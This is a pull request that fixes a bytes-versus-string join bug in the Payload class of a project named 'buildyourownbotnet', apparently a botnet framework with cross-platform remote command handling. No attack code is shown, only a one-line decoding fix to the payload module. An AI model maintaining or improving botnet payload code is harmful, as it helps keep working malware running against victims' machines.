### PR TITLE
Joining byte and strings is a no no

### DIFF
--- a/web-gui/buildyourownbotnet/core/payloads.py
+++ b/web-gui/buildyourownbotnet/core/payloads.py
@@ -307,7 +307,7 @@ class Payload():
                     output.append(line)
                 else:
                     break
-        return '\n'.join(output)
+        return b'\n'.join(output).decode(errors="ignore")
 
 
     @config(platforms=['win32','linux','linux2','darwin'], command=True, usage='pwd')


### PR DESCRIPTION
Line 310: Joining byte and strings is a no no. 
Fix: join bytes with byte first then decode using utf8 and ignore if failed to decode.